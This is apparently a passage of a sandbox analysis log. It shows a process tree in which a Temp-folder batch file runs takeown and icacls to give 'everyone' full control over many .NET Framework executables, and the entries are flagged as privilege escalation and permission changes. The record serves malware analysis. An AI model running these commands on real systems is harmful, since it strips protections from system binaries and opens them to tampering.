  2⤵
  PID:3956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe" /grant "everyone":(f)
    3⤵
    PID:4040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"
  2⤵
  PID:3608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" /grant "everyone":(f)
    3⤵
    PID:6012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
  2⤵
  PID:5920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" /grant "everyone":(f)
    3⤵
    PID:712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:5988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:5952
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" /grant "everyone":(f)
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /grant "everyone":(f)
    3⤵
    PID:5092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe"
  2⤵
  PID:4440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe"
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe" /grant "everyone":(f)
    3⤵
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe"
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe"
    3⤵
    PID:432
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe" /grant "everyone":(f)
    3⤵
    PID:512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe"
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe"
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe" /grant "everyone":(f)
    3⤵
    PID:4988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe"
  2⤵
  PID:5200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\WsatConfig.exe"
  2⤵
  PID:5520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\WsatConfig.exe"
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\WsatConfig.exe" /grant "everyone":(f)
    3⤵
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe"
  2⤵
  PID:5592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe"
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe" /grant "everyone":(f)
    3⤵
    PID:5748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess.exe"
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess.exe" /grant "everyone":(f)
    3⤵
    PID:4216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe"
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe"
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe"
  2⤵
  PID:4456
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe"
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe" /grant "everyone":(f)
    3⤵
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe"
  2⤵
  PID:4116
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:96
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe"
    3⤵
    PID:372
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe" /grant "everyone":(f)
    3⤵
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe"
  2⤵
  PID:5676
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe"
    3⤵
    - Modifies file permissions
    PID:5680
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe" /grant "everyone":(f)
    3⤵
    PID:3964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe"
  2⤵
  PID:5180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe"
    3⤵
    - Modifies file permissions
    PID:1684
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe" /grant "everyone":(f)
    3⤵
    PID:5108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe"
  2⤵
  PID:5176
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe"
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe" /grant "everyone":(f)
    3⤵
    PID:4952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe"
  2⤵
  PID:4340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe"
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:5824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe" /grant "everyone":(f)
    3⤵
    PID:516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
  2⤵
  PID:2096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" /grant "everyone":(f)
    3⤵
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
  2⤵
  PID:3260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2192
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:4268
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  2⤵
  PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5476
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" /grant "everyone":(f)
    3⤵
    PID:5724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:5632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1488
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  PID:5320
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" /grant "everyone":(f)
    3⤵
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
  2⤵
  PID:5472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:5244
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe"
  2⤵
  PID:5484
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe"
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe" /grant "everyone":(f)
    3⤵
    PID:5460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
  2⤵
  PID:5444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:3488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  PID:2732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" /grant "everyone":(f)
    3⤵
    PID:5344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe" /grant "everyone":(f)
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
  2⤵
  PID:5956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
  2⤵
  PID:5892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
    3⤵
    - Modifies file permissions
    PID:4896
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" /grant "everyone":(f)
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"
  2⤵
  PID:4920
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:1608
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe" /grant "everyone":(f)
    3⤵
    PID:6072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe"
  2⤵
  PID:5896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe"
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe" /grant "everyone":(f)
    3⤵
    PID:2924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"
  2⤵
  PID:5860
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:2668
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe" /grant "everyone":(f)
    3⤵
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
    3⤵
    PID:3956
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:4996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:3608
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /grant "everyone":(f)
    3⤵
    PID:5972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  PID:6016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:5128
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" /grant "everyone":(f)
    3⤵
    PID:4468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"
  2⤵
  PID:3632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe" /grant "everyone":(f)
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:1008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" /grant "everyone":(f)
    3⤵
    PID:4608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe" /grant "everyone":(f)
    3⤵
    PID:3288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
  2⤵
  PID:432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" /grant "everyone":(f)
    3⤵
    PID:5208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
  2⤵
  PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
    3⤵
    - Modifies file permissions
    PID:2208
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" /grant "everyone":(f)
    3⤵
    PID:5356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:5148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Modifies file permissions
    PID:5520
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5596
- C:\Windows\SysWOW64\cmd.exe
